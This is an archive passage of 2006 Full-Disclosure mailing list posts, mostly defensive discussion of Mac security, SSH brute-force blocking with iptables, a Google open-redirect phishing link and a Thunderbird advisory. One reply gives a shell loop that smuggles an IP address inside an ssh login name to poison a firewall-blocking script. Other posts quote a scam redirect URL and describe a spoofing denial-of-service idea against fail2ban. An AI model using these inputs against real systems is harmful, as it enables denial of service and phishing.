 Blackhat, SANS or Cisco Networkers makes me question
 if I should even respond...I will anyway.

 Yes, it's true a lot of folks, particularly in the
 security realm use Macs, myself included. The reason I
 use it has nothing to do with an imaginary belief in
 security supremacy, but rather that the tools I use on
 a daily basis run natively along side software like MS
 office. Previously, like many others, I would have
 been forced to run a kludgy dual boot or VMware based
 solution to solve this. OSX was the perfect solution.

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On
 Behalf Of Stef
 Sent: Tuesday, February 28, 2006 11:14 AM
 To: Untitled
 Subject: Re: [Full-disclosure] Question about Mac OS X
 10.4 Security

 On 2/28/06, Paul Schmehl [EMAIL PROTECTED] wrote:
 snip
 
  Still, the ignorance of Mac users, who believe their
 platform is
  somehow magically secure will contribute to the
 problem.
 
  Paul Schmehl ([EMAIL PROTECTED])
  Adjunct Information Security Officer
  University of Texas at Dallas
  AVIEN Founding Member
  http://www.utdallas.edu/ir/security/


 I am sorry, Paul, but I have to take you up on this,
 especially with your tendency of generalizing
 everything. I have used *nix in the past, for all my
 network and security tools, until MacOSX presented
 itself as an opportunity for migration, when I had a
 need for a new laptop (over two years ago). At that
 time the 2.6 kernel and available modules weren't up
 to the tasks of the latest hardware capabilities of
 x86 laptops, so - on an advice from a friend of mine -
 I have tried an iBook. I have been able to compile and
 port all my tools just fine, especially with the help
 of the underlying like-BSD infrastructure (long live
 fink and Darwin-ports). All I can tell you is that -
 ever since - I never looked back at other choices
 (w/the exception of Windows, which was never
 considered among choices, anyway, due to limitations
 in cygwin, not talking about the many other obvious
 reasons for the OS, itself ;)), and have recently got
 myself the latest still-PPC Powerbook, which just
 confirmed the rightness of the original migration. As
 a repository of security and network tools, I have
 thrown at this baby everything I can possible think
 of, and still haven't found a way to break it ...

 ... so the Mac users are not [only] the bunch of
 idiots/ignorants whom you tend to describe - I would
 just invite you to attend a blackhat or shmoocon, or
 even SANS or Cisco networkers, and let me know how
 many Mac users you can count there ... and then ask
 yourself why ... but then, again, I may be wrong ;

 Stef
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force log

2006-02-28 Thread Matthijs van Otterdijk
Extra padding for a big attack, part of a botnet, just a bunch of
scriptkiddies in a desperate need of attention... There are many
reasons, and most don't really have to do with you I think.

(Big bad wolf can't be really big bad wolf-ish btw when you can only attempt a login every x seconds :-P)

P.S. No offence ever taken.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] reduction of brute force log

2006-02-28 Thread Joachim Schipper
On Tue, Feb 28, 2006 at 10:52:27AM -0600, Bob Radvanovsky wrote:
 I am going to test these rules out -- this looks REALLy good!
 But...I've got just ONE question: why on Earth would you permit
 ICMP???

(Outgoing) echo requests and port-unreachable responses (to UDP
packets), just to name a couple.

Source quench and redirect are both powerful, but also more than a
little dangerous to allow.

 And what significances are ports 50, 51, 1599, 1600 and 1601?  443 and 80 are 
 HTTP-S and HTTP (respectively), 123 is NTP -- I realize that, but what are 
 these others ports used for?

We are talking about IP *protocols* 50 and 51, which are ESP and AH -
the IPsec protocols.

The 1599-1601 ports are used to open/close the ssh port, as explained in
the article linked.

This firewall configuration should work as advertised. Of course,
restricting logins to public key authentication should work, and has the
added advantage that one does not try to login from yet another
keylogger-infected Windows box.

Joachim

 -r
 
 *filter
 :INPUT ACCEPT [0:0]
 :FORWARD ACCEPT [0:0]
 :OUTPUT ACCEPT [0:0]
 :RH-Firewall-1-INPUT - [0:0]
 -A INPUT -j RH-Firewall-1-INPUT
 -A FORWARD -j RH-Firewall-1-INPUT
 -A RH-Firewall-1-INPUT -i lo -j ACCEPT
 -A RH-Firewall-1-INPUT -s 10.0.0.0/24 -j ACCEPT
 -A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT
 -A RH-Firewall-1-INPUT -p 50 -j ACCEPT
 -A RH-Firewall-1-INPUT -p 51 -j ACCEPT
 -A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -m 
 recent --rcheck --name SSH -j ACCEPT
 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT
 -A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 123 -j 
 ACCEPT
 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 443 -j 
 ACCEPT
 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1599 -m 
 recent --name SSH --remove -j DROP
 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1600 -m 
 recent --name SSH --set -j DROP
 -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1601 -m 
 recent --name SSH --remove -j DROP
 -A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited
 COMMIT
 
 
 - Original Message -
 From: Matthijs van Otterdijk [mailto:[EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] reduction of brute force login attempts via 
 SSHthrough iptables --hashlimit
 
 
  I haven't tried this myself, and I don't know if it is already suggested,
  but this should stop all the pesky scriptkiddies from filling up your logs.
  Might prove to be a better solution, who knows:
  http://aplawrence.com/Security/sshloginattack.html
  
  Matthijs
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Mike Owen
On 2/28/06, Stef [EMAIL PROTECTED] wrote:
 On 2/28/06, Paul Schmehl [EMAIL PROTECTED] wrote:
  Still, the ignorance of Mac users, who believe their platform is somehow
  magically secure will contribute to the problem.
 
snip
 I am sorry, Paul, but I have to take you up on this, especially with
 your tendency of generalizing everything. I have used *nix in the
snip
 ... so the Mac users are not [only] the bunch of idiots/ignorants whom
 you tend to describe - I would just invite you to attend a blackhat or
 shmoocon, or even SANS or Cisco networkers, and let me know how many
 Mac users you can count there ... and then ask yourself why ... but
 then, again, I may be wrong ;

 Stef


Stef,

You're describing your own experiences, and those of other security
professionals. What Paul is describing is the normal user. I agree
with him that the normal user thinks that because they have a Mac,
they are suddenly immune to everything. As an example, a good friend
of mine has been using an iBook and an iMac for several years, and
likes to talk about how she doesn't have to deal with all the viruses
and problems that her Windows using friends have. When I asked, she
had never done a single update on her computers, because she didn't
think she needed to. I've since convinced her to check for updates on
a weekly basis, which while not perfect, has at least kept her
patched.

Mike
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about Mac OS X 10.4 Security

2006-02-28 Thread Paul Schmehl
--On Tuesday, February 28, 2006 11:03:12 -0600 Stef [EMAIL PROTECTED] 
wrote:



If you look at the [very, very] specific paragraph I was referring to,
from Paul's email, then I hope you will agree with me that what I was
trying to convey was the need to avoid generalizing categorization of
users ... having said that, the implications are that a much higher
awareness, and - in turn - possibility of addressing and/preventing
issues related to vulnerabilities exists in the Mac community, vs. the
Windows one, for example.

Let's see.  I use Windows XP, Mac OS 10.3.9 and FreeBSD 5.4 SECURITY daily. 
Therefore all three platforms obviously have a much higher awareness of 
security issues, right?


At least that *seems* to be your logic.

The fact is, as a community, Mac users have the belief that their system is 
secure - that they have nothing to worry about.  *Of course* there are 
Mac users that are astute and fully understand the risks.  Just as there 
are Windows users who are the same way.


Just because the geeks have taken to the Mac OS doesn't mean its community 
has raised its level of awareness more than a nanometer or two.  In fact, 
when I sent a campus-wide announcement about the recent shell 
vulnerability, the *majority* of comments that I got from users *within* IT 
was, You're spreadying FUD.  Mac's are not anywhere near as risky as using 
Windows.  Professors and others emailed me asking, What do I need to do 
to be safe?


If you think the Mac you're using is secure, I encourage you to go try to 
run the poc that Secureiteam posted.  Just be sure to bring a clean pair of 
drawers with you.


I've used Windows since it first came out.  I've never had a single virus 
infection, never had a single machine hacked, never had an incident of any 
kind.  Does that mean Windows is secure?  Of course not!  The idea that, 
because you are using a Mac, you have less to worry about, is just as silly 
as the idea that, because you're using Unix, you have less to worry about.


Guess which platform get's hacked the most here?  (Hint - it ain't Windows.)

In *general*, the hosts that are the most risk are the ones that are the 
most poorly maintained (if they're maintained at all), and the OS they are 
running is irrelevant.  There's only one OS that I know of, on this campus, 
that has never been hacked, and it has nothing to do with the OS and 
everything to do with how it's maintained and how it's protected (and no, I 
ain't telling you what it is.)


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Google + Amazon fun scam

2006-02-28 Thread Dave Korn
[EMAIL PROTECTED] wrote:

 If i remember I saw on this list a post wich was warning about faking
 scam links within google.com domain.
 I got this scam today:

 [SCAM]http://google.com/url?sa=ppref=igpval=2q=http://wielrenneninlimburg.nl/forum/www.amazon.com/index.html[/SCAM]

 wich is pretty easy to discover but I have tried a variant wich the
 scammer probably forgot to use to grow his fooling possiblities:

 [SCAM]http://google.com/url?sa=ppref=igpval=2q=%68%74%74%70%3A%2F%2F%77%69%65%6C%72%65%6E%6E%65%6E%69%6E%6C%69%6D%62%75%72%67%2E%6E%6C%2F%66%6F%72%75%6D%2F%77%77%77%2E%61%6D%61%7A%6F%6E%2E%63%6F%6D%2F%69%6E%64%65%78%2E%68%74%6D%6C[/SCAM]

  This is the exact same vuln really, calling it a variant seems to be 
slightly exaggerated.

 should be nasty to scam google services or anything other via this
 way. the scammer will hide its domain + steal google.com domain.

  The scammer will do no such thing, that's a very ordinary redirect and the 
browser's address bar will show the scammer's domain and have nothing to do 
with google.  You should have tried it out before you said this!  Here's a 
couple of safe examples for you to try and see for yourself that it hides 
nothing and steals nothing.

http://google.com/url?sa=ppref=igpval=2q=http://news.bbc.co.uk

http://google.com/url?sa=ppref=igpval=2q=%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B%2F


  I don't think this is much use for a scam; sure, it can to hide the real 
destination address, but it doesn't let you replace it with a bogus one, and 
besides, if you get an email from your bank telling you to update your 
account but the link says google.com, isn't that /more/ likely to make 
people suspicious and less likely to fool them then if it just had a domain 
name in plain text that was just very-similar-but-not-quite-the-same as the 
real bank name?

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Re: Google + Amazon fun scam

2006-02-28 Thread Steven Rakick
If anything, it's probably best suited (and even then,
not very well) to steal authentication information for
Google Services by replicating a login page. Still a
stretch.

[EMAIL PROTECTED] wrote:

 If i remember I saw on this list a post wich was
warning about faking 
 scam links within google.com domain.
 I got this scam today:


[SCAM]http://google.com/url?sa=ppref=igpval=2q=http://wielrenneninl
 imburg.nl/forum/www.amazon.com/index.html[/SCAM]

 wich is pretty easy to discover but I have tried a
variant wich the 
 scammer probably forgot to use to grow his fooling
possiblities:


[SCAM]http://google.com/url?sa=ppref=igpval=2q=%68%74%74%70%3A%2F%2

F%77%69%65%6C%72%65%6E%6E%65%6E%69%6E%6C%69%6D%62%75%72%67%2E%6E%6C%2F

%66%6F%72%75%6D%2F%77%77%77%2E%61%6D%61%7A%6F%6E%2E%63%6F%6D%2F%69%6E%
 64%65%78%2E%68%74%6D%6C[/SCAM]

  This is the exact same vuln really, calling it a
variant seems to be slightly exaggerated.

 should be nasty to scam google services or anything
other via this 
 way. the scammer will hide its domain + steal
google.com domain.

  The scammer will do no such thing, that's a very
ordinary redirect and the browser's address bar will
show the scammer's domain and have nothing to do with
google.  You should have tried it out before you said
this!  Here's a couple of safe examples for you to try
and see for yourself that it hides nothing and steals
nothing.

http://google.com/url?sa=ppref=igpval=2q=http://news.bbc.co.uk

http://google.com/url?sa=ppref=igpval=2q=%68%74%74%70%3A%2F%2F%77%77%77%2E%62%62%63%2E%63%6F%2E%75%6B%2F


  I don't think this is much use for a scam; sure, it
can to hide the real destination address, but it
doesn't let you replace it with a bogus one, and
besides, if you get an email from your bank telling
you to update your account but the link says
google.com, isn't that /more/ likely to make people
suspicious and less likely to fool them then if it
just had a domain name in plain text that was just
very-similar-but-not-quite-the-same as the real bank
name?

cheers,
  DaveK
--
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force log

2006-02-28 Thread Gary E. Miller
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yo Bob!

On Tue, 28 Feb 2006, Bob Radvanovsky wrote:

 I am going to test these rules out -- this looks REALLy good!  But...I'v
 e got just ONE question: why on Earth would you permit ICMP???

No ICMP means no P-MTU.  No P-MTU mean non-working tunnels.

You want to shoot yourself in the foot, tben go ahead and block ICMP.

RGDS
GARY
- ---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED]  Tel:+1(541)382-8588 Fax: +1(541)382-8676

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.1 (GNU/Linux)

iD8DBQFEBK9J8KZibdeR3qURAvwAAJ9Ch+I69KUX6khjcVBHVzrATEfB3ACgw4O4
BQ19Hd2H4WDXLJQNEqf5qLk=
=rGZb
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force log

2006-02-28 Thread Bob Radvanovsky
Yeah...I didn't see that.  I thought those were ports.  My bad...  :((

- Original Message -
From: Joachim Schipper [mailto:[EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] reduction of brute force log


 On Tue, Feb 28, 2006 at 10:52:27AM -0600, Bob Radvanovsky wrote:
  I am going to test these rules out -- this looks REALLy good!
  But...I've got just ONE question: why on Earth would you permit
  ICMP???
 
 (Outgoing) echo requests and port-unreachable responses (to UDP
 packets), just to name a couple.
 
 Source quench and redirect are both powerful, but also more than a
 little dangerous to allow.
 
  And what significances are ports 50, 51, 1599, 1600 and 1601?  443 and 80
 are HTTP-S and HTTP (respectively), 123 is NTP -- I realize that, but what
 are these others ports used for?
 
 We are talking about IP *protocols* 50 and 51, which are ESP and AH -
 the IPsec protocols.
 
 The 1599-1601 ports are used to open/close the ssh port, as explained in
 the article linked.
 
 This firewall configuration should work as advertised. Of course,
 restricting logins to public key authentication should work, and has the
 added advantage that one does not try to login from yet another
 keylogger-infected Windows box.
 
   Joachim
 
  -r
  
  *filter
  :INPUT ACCEPT [0:0]
  :FORWARD ACCEPT [0:0]
  :OUTPUT ACCEPT [0:0]
  :RH-Firewall-1-INPUT - [0:0]
  -A INPUT -j RH-Firewall-1-INPUT
  -A FORWARD -j RH-Firewall-1-INPUT
  -A RH-Firewall-1-INPUT -i lo -j ACCEPT
  -A RH-Firewall-1-INPUT -s 10.0.0.0/24 -j ACCEPT
  -A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT
  -A RH-Firewall-1-INPUT -p 50 -j ACCEPT
  -A RH-Firewall-1-INPUT -p 51 -j ACCEPT
  -A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -m
 recent --rcheck --name SSH -j ACCEPT
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j
 ACCEPT
  -A RH-Firewall-1-INPUT -m state --state NEW -m udp -p udp --dport 123 -j
 ACCEPT
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 443 -j
 ACCEPT
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1599 -m
 recent --name SSH --remove -j DROP
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1600 -m
 recent --name SSH --set -j DROP
  -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 1601 -m
 recent --name SSH --remove -j DROP
  -A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited
  COMMIT
  
  
  - Original Message -
  From: Matthijs van Otterdijk [mailto:[EMAIL PROTECTED]
  To: full-disclosure@lists.grok.org.uk
  Subject: Re: [Full-disclosure] reduction of brute force login attempts via
 SSH   through iptables --hashlimit
  
  
   I haven't tried this myself, and I don't know if it is already
 suggested,
   but this should stop all the pesky scriptkiddies from filling up your
 logs.
   Might prove to be a better solution, who knows:
   http://aplawrence.com/Security/sshloginattack.html
   
   Matthijs
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread GroundZero Security
Hello,

i made a small bash script last year to block those bruteforce attempts 
automatically via the firewall.
In case someone is interested, i released it on our website. Someone may have a 
use for it :-)
http://www.groundzero-security.com/code/bruteforce-block.sh
Have a nice day everyone!

-sk


GroundZero Security Research and Software Development
http://www.groundzero-security.com

Wir widersprechen der Nutzung oder Übermittlung unserer Daten
für Werbezwecke oder für die Markt- oder Meinungsforschung (§ 28 Abs. 4 BDSG).

pub  1024D/69928CB8 2004-09-27 Stefan Klaas [EMAIL PROTECTED]
sub  2048g/2A3C7800 2004-09-27

Key fingerprint = A93E 41F8 7E82 5F2C 3E76  41F1 4BCF 3096 6992 8CB8

-BEGIN PGP PUBLIC KEY BLOCK-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQGiBEFX440RBADGTKOgZR9Y9VA/cfNLWTIN/OmXe9l6UZJ6pY8Hqcv6DFE//Kt9
UfQMU470i+I7SvIHZN066Kl4ts4r90sLxXrE4r5VQCLTsJM68cliatrM8MbbZZs+
xf3ldelZrHNvHkXDk4I/n3O56F9M6tZ/S71AIj++raIbFX57fn8Z8NNOnwCgwDr6
LDVP+5N4DML1/+uvXNtoL30D/A/GUXd6lJ8i7MoZMzwKk1uwDsgWwP+Wm0hMwJMr
fR/di9K55pGdlGFNO5P2L3qOl2BaC8raNkLcXaweW+bao3P66nzpdtmecsjCMWq2
tQWgu/O7S1FgzlUAKJSOc2Th5PY9Raum8bXnSv4gnHZCKjNskIdrz8WDxCzEoPtZ
eCssA/9ydHRvNIPjOTmzjXoE+UbJrB/U//u3dpAsLkzclKeSgjV2eYUgHGcqYn+H
cFoubD78yFWqZqYtxfiyjBlItsIn9ls0gAZFKDFHd1XfOLFSa0/NHNpHLxCZGFIA
tQ0Gp47VRmTPkWJ7lB505w0XioNs1H/1K1RSp++7+t1SNkBlobQpU3RlZmFuIEts
YWFzIDxza0Bncm91bmR6ZXJvLXNlY3VyaXR5LmNvbT6IVwQTEQIAFwUCQVfjjQUL
BwoDBAMVAwIDFgIBAheAAAoJEEvPMJZpkoy4AnYAmwTot1PMUty1YoCuMVg6cpr7
HKy1AJ98jyzD365YkIQAEiihXlQJ4zrxBLkCDQRBV+OvEAgAiu75prsTQZdNijtY
eMQhl4tEL8qi8JOFluYGnvPYjDzU0PY9E4mNx/w2BgYcM3lTVzSmaiLEJ1AzeOHn
w+pLDWsorRZuVI9q3+ExW3s2yFX4ppdHAVBMuYsQyVJRkbobCkcwTbUYXr23pKzh
D8WRAJ991k2lNcQHxMgixAN+55XBFLhwLB0Yz7XmhFYLid5dLxdPllLIV3ZHDeY0
SEqMSpw96+gV0QpX7YH9U2VBr3Wz7Ss6qNZkcgHQw1xmk6Yy24QnT4a9oZD06Yjr
cCocXnyI/YLW1wXo/6Hh44UH3b9mKUX6eh8ybn7QCnZDG7AdxbglLiPTkdcx0YoT
NANZBwADBwf8CrjVKiXSzyhUsdH1es1KQCZ/zH6PvPzdxqYuGuVVMzgaJeeOMS2G
4rLfw2ILahAS0fjng6zX2c1ndPVJ6oAq3IygWsqJH6Uh23NmKTlyx3KtSgyW7YsB
Rn/4wobuojArTHTl+X3U4JZTUEb9E4osB9bFjdsgXcxNSwXghQMh1x5eS5/fcjLd
tACNq0x2/zh8zTJFHK+oNCLY2+iBjTUn7K03rEhQo6HqbPYwyc3LUCwBuFHFDVWp
bZqa4knO0H5BBmbiI09kaVPOs0qRLXCAf1oy9PxK5ZBJ4WfQAnMAU+TuNrTuW2SU
NMh92TCELdDpl/pMDbbBGeJdMvXZmY99HIhGBBgRAgAGBQJBV+OvAAoJEEvPMJZp
koy4p1QAoIaYw3VxA0/mixUsMO4R13sXIL/pAJ9zodR+A9+bLqCRlVusG8JhItv1
Ow==
=E0o1
-END PGP PUBLIC KEY BLOCK-

Diese E-Mail kann vertrauliche Informationen enthalten. Wenn Sie nicht der
richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren
Sie bitte sofort den Absender und vernichten Sie diese E-Mail.
Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser E-Mail oder von
Teilen dieser E-Mail ist nicht gestattet.

This E-mail might contain confidential information. If you are not the right 
addressee
or you have recived this Mail in error, please inform the Sender as soon as 
possible
and delete this E-Mail immediately. You are not allowed to make any copies or
relay this E-Mail.
- Original Message - 
From: Jay Libove [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Tuesday, February 28, 2006 2:23 AM
Subject: [Full-disclosure] reduction of brute force login attempts via SSH 
through iptables --hashlimit


 Quite some time back, I posted a question here about brute force login
 attempts through SSH which had recently become a noticeable annoyance.
 There was some discussion here on the list, someone suggested using
 hashlimit, and I think the issue of brute force attempts through SSH has
 become just one more part of the background noise of the Internet.

 I finally got back around to looking at this on my system, and I figured
 out why my first attempts at using the hashlimit functionality in iptables
 had not worked.  Hopefully late is better than never, so I present it here
 to anyone else who was as stupid and/or lazy as I was :) so that it took
 me this long to get back to work on it and get it right.

 Here is an iptables command to allow inbound SSH with a quite low limit on
 the number of connections which may arrive from a specific IP address in a
 short period of time. Combined with the default setting of OpenSSH which
 drops a connection after just a few failed login attempts, this has
 reduced the number of failed logins I am seeing in my nightly logwatch
 output from thousands to about ten per day. Since this use of hashlimit
 filters on source IP address, it does not create a denial of service
 against legitimate SSH connections, unless someone spoofs a very large
 range of source addresses and can somehow get those connections to
 actually open instead of just consume partly open TCP sessions.  In such a
 case, other defenses are needed anyway.

 # iptables --table filter -A INPUT --protocol tcp --source 0/0 \
 --destination-port ssh -m hashlimit --hashlimit 2/minute \
 --hashlimit-burst 3 --hashlimit-mode srcip --hashlimit-name ssh \
 -m state --state NEW --jump ACCEPT

 The 

Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread Christian \Khark\ Lauf
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

was fail2ban ( http://fail2ban.sourceforge.net/ ) already mentioned?
It works like -sk's script. It searches your auth.log (or wherever your
sshd messages go to) for all typical sshd failure-messages.

After a user-defined count of n login failures from one IP where
counted  in x user-defined seconds, it bans all traffic from that IP
for t seconds via iptables.
After t seconds the rule will be automatically delete.
On my Debian Sarge server it works quite well. (Included in Debian Etch,
Gentoo and RedHat packages are also available.)

But I haven't tested if fail2ban is vulnerable against DoS-Attacks, for
example if you spoof your IP with the IP of the gateway your server is
directly connected to. And then try to login via ssh on $victim_host
with the IP of $gateway.
 - Would have the side-effect that ALL incoming traffic will be dropped,
as long as the rule stays active.

iptables -L output shows the following for fail2ban chain:

# Before - Empty ruleset #
Chain fail2ban-SSH (1 references)
target prot opt source   destination
RETURN all  --  anywhere anywhere

# After adding an IP to banlist #
Chain fail2ban-SSH (1 references)
target prot opt source   destination
DROP   all  --  shell.xx.de  anywhere
RETURN all  --  anywhere anywhere

Though, the iptables-commands can be easily changed in
/etc/fail2ban.conf (look for fwban).


Just my 2 cents,
  Christian Khark Lauf
- --
Christian Khark Lauf [EMAIL PROTECTED]
GPG: 0x6AADC60A | IRCnet/silcnyet: Khark
silcnyet-Fingerprint: 9424 E3BF B637 E1FC E355 BA7C 01CC 1B68 3A1C E330
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)

iD8DBQFEBMSUAaLWKGqtxgoRApY8AJ47D5FfQ/bgIeZ6NSO9YF5hA6IarwCcDdQZ
ohVxfnuF+8FCfMbPYjHtgL4=
=KpTi
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread Gary Leons
On 2/28/06, GroundZero Security [EMAIL PROTECTED] wrote:
 Hello,

 i made a small bash script last year to block those bruteforce attempts 
 automatically via the firewall.
 In case someone is interested, i released it on our website. Someone may have 
 a use for it :-)
 http://www.groundzero-security.com/code/bruteforce-block.sh
 Have a nice day everyone!

 -sk

That is remarkably shoddy coding from a security research and
software developer.

*NEWS FLASH* most platforms allow login names to contain spaces.

$ for ((i=0;i5;i++));
  do ssh -l j00 ar3 l4m3 222.173.190.239 idiot.running.this.script.com
  done

And i just added an arbitrary address to your firewall, fun!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Renaud Lifchitz wrote:
 Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

We believe this to be a testing error. The problem of loading remote
iframe and css content was fixed prior to the release of Mozilla
Thunderbird 1.0

The testcase included in the advisory contains the iframe and css
content in-line with the message. That will always be shown as there is
no privacy issue with doing so and does not demonstrate the remote
loading issue claimed.

Once a user has pressed the Show Images button--not the best label
since it covers all remote content--that state is stored in the mailbox
metadata/index file (.msf) and the remote content will then be loaded on
future viewings. If the .msf file is not deleted between tests this
could give the appearance of the bug described in the advisory.

There is a minor residual privacy issue if people whose mail you keep
and reread are setting webbugs on you (your boss could find out how many
times you read his memo?), but in most cases your privacy is fully blown
once you load the remote content the first time.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread GroundZero Security
well i somehow felt someone will be pedantic over it.
its a quick script originally thrown together in a few minutes for personal use 
and wasn't really 
intended to be released, i just thought it may help someone. 
besides that this is ment to stop those bruteforce attempts which *all* have 
more than
enough users without spaces they try. or do you know anyone that does ssh 
bruteforce by hand?
you may be able to add a bogus ip (wow your l33t), but it wouldnt be of any use 
so...
instead of beeing a smartass why dont you provide a better solution for the 
people who are annoyed by
those bruteforce attacks? 

- Original Message - 
From: Gary Leons [EMAIL PROTECTED]
To: GroundZero Security [EMAIL PROTECTED]
Cc: Jay Libove [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Tuesday, February 28, 2006 10:52 PM
Subject: Re: [Full-disclosure] reduction of brute force login attempts via SSH 
through iptables --hashlimit


 On 2/28/06, GroundZero Security [EMAIL PROTECTED] wrote:
  Hello,
 
  i made a small bash script last year to block those bruteforce attempts 
  automatically via the firewall.
  In case someone is interested, i released it on our website. Someone may 
  have a use for it :-)
  http://www.groundzero-security.com/code/bruteforce-block.sh
  Have a nice day everyone!
 
  -sk
 
 That is remarkably shoddy coding from a security research and
 software developer.
 
 *NEWS FLASH* most platforms allow login names to contain spaces.
 
 $ for ((i=0;i5;i++));
   do ssh -l j00 ar3 l4m3 222.173.190.239 idiot.running.this.script.com
   done
 
 And i just added an arbitrary address to your firewall, fun!
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit

2006-02-28 Thread Gary Leons
On 2/28/06, GroundZero Security [EMAIL PROTECTED] wrote:
 you may be able to add a bogus ip (wow your l33t), but it wouldnt be of any 
 use so...

Uhh, no use? -s accepts a netmask as well as addresses, it's not just
add a bogus ip, I can effectively kick your machine off the network.
Apart from that the code looks very flimsy, I'll bet there's an
arbitrary command execution in there somewhere.

 instead of beeing a smartass why dont you provide a better solution for the 
 people who are annoyed by
 those bruteforce attacks?

Why dont you parse the output of lastb -i, dumbass.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Daniel Veditz wrote:
 [a plain text message]

Just got half a dozen bounces because my plain-text email supposedly
contained Suspicious I-Frame.a (Malicious Mobile Code) virus. Those of
